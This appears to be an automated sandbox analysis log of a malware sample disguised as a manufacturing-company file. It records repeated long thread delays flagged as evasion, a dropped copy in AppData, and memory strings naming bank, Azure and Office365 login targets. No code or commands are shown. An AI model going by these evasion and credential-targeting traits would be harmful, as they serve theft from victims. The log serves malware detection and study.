Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -597624s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -597514s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -597385s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -597280s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -597172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -597063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -596938s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -596813s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -596703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -596594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -596469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -596360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -596235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -596110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -595985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -595860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -595735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -595610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -595485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -595360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -595235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -595110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -594985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -594843s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -594494s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -594391s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -594266s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -594141s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -594031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784 Thread sleep time: -593922s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 6932 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 6216 Thread sleep count: 2942 > 30
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 6216 Thread sleep count: 6907 > 30
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -599445s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -599216s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -599106s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -598900s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -598623s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -598515s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -598406s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -598296s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -598187s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -598078s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -597968s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -597859s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -597750s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -597640s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -597531s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -597421s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -597312s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -597203s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -597092s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -596984s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -596874s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -596765s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -596656s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -596546s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -596437s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -596235s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -596084s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -595811s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -595692s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -595562s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -595453s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -595344s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -595223s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -595094s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -594984s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -594875s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -594765s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -594656s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -594547s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -594437s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -594328s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -594219s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -594109s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -593999s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172 Thread sleep time: -593885s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 599870 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 599764 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 599078 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 598969 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 598844 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 598734 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 598625 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 598516 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 598406 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 598297 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 598188 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 598063 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 597953 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 597843 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 597733 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 597624 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 597514 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 597385 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 597280 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 597172 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 597063 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 596938 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 596813 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 596594 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 596360 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 596110 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 595985 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 595860 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 595735 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 595610 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 595485 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 595360 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 595235 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 595110 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 594985 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 594843 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 594494 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 594391 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 594266 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 594141 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 594031 Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe Thread delayed: delay time: 593922 Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 599445
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 599216
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 599106
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 598900
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 598623
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 598515
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 598406
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 598296
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 598187
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 598078
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 597968
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 597640
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 597531
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 597421
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 597312
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 597203
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 597092
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 596874
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 596546
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 596084
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 595811
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 595692
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 595562
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 595453
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 595344
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 595223
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 595094
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 594984
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 594875
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 594765
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 594547
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 594437
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 594328
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 594219
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 594109
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 593999
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe Thread delayed: delay time: 593885
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696501413o
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696501413j
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696501413j
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696501413
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.00000000040B3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696501413
